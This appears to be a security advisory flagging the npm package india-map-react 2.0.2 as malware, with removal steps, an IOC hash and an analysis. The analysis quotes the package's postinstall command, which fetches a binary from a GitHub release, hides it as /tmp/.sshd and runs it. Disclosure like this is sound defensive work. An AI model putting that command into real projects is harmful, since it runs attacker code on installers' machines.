Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

india-map-reactnpm

Malicious code in india-map-react (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5542
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall india-map-react

What this malware does

On npm install, the package's postinstall script runs curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &. The fetch disables TLS verification (-k), silences errors (-s plus 2>/dev/null), targets a latest-tagged (mutable) release on a GitHub account (parikhpreyash4) that does not match the npm publisher (yuvrajDurgesh), stages the downloaded binary at the hidden path /tmp/.sshd to impersonate the SSH daemon, sets it executable, and launches it backgrounded. The package's advertised purpose is a React component for an India map; downloading and executing an unrelated native binary from a third-party GitHub account is unrelated to that purpose. Every installer running npm install [email protected] is forced to execute attacker-controlled code on their machine.

Malicious versions

1 flagged
2.0.2

Indicators of compromise (SHA-256)

52ba840948b1421783ed9d4202d4943e23f18b811068449461197ad4eae677d2

Frequently asked questions

No. india-map-react on npm has been identified as a malicious package (version 2.0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005374

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
india-map-react (npm) malicious package — MAL-2026-5542 | O3 Security